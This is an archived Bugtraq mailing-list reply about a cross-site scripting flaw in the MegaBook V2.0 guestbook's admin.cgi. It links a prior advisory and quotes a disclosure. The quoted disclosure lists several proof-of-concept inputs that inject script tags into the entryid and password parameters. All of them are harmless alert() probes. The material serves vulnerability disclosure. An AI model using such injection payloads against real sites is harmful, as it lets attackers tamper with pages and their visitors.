Re: MegaBook V2.0 - Cross Site Scripting Exploit

From: Morning Wood (wood_at_exploitlabs.com)
Date: 05/06/05

  • Next message: GulfTech Security Research: "Multiple Vulnerabilities In Invision Power Board"
    Date: 6 May 2005 07:18:31 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) In-Reply-To: <20050505104551.23441.qmail@www.securityfocus.com>

    umm..
    http://exploitlabs.com/files/advisories/EXPL-A-2003-011-megabook-2.0.txt

    >Subject: MegaBook V2.0 - Cross Site Scripting Exploit
    >
    >
    >
    >The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi
    >
    >URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)
    >
    >I have tested the script with the following query:
    >
    >?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;
    >
    >I have also tested the script with theses POST variables:
    >
    >action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;
    >
    >action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;
    >
    >action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;
    >
    >action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;
    >
    >action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;
    >
    >
    >Yours,
    >SpyHat
    >


  • Next message: GulfTech Security Research: "Multiple Vulnerabilities In Invision Power Board"

    Relevant Pages

    • Re: MegaBook V2.0 - Cross Site Scripting Exploit
      ... The same vulnerability also exist in the new version of MegaBook V2.1 ... >The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. ...
      (Bugtraq)
    • MegaBook V2.0 - Cross Site Scripting Exploit
      ... The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. ... I have also tested the script with theses POST variables: ...
      (Bugtraq)
    • Re: Anyone know this rootkit (rootkits?)
      ... There's a collection of scripts that checks for various rootkits at: ... sometimes when using an exploited login program, ... and it may have been missed by the attacker. ...
      (Incidents)
    • [UNIX] KisMAC Local Privilege Escalation
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... shell scripts enabled by KisMAC. ... The core issue is that an attacker can ... Load arbitrary kernel modules. ...
      (Securiteam)
    • Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)
      ... since they managed to execute commands via Apache. ... and 30 minutes before one of the scripts was uploaded. ... Sounds like one of the many PHP scripts is exploitable. ... this means that the exploit would allow the attacker to run ...
      (Incidents)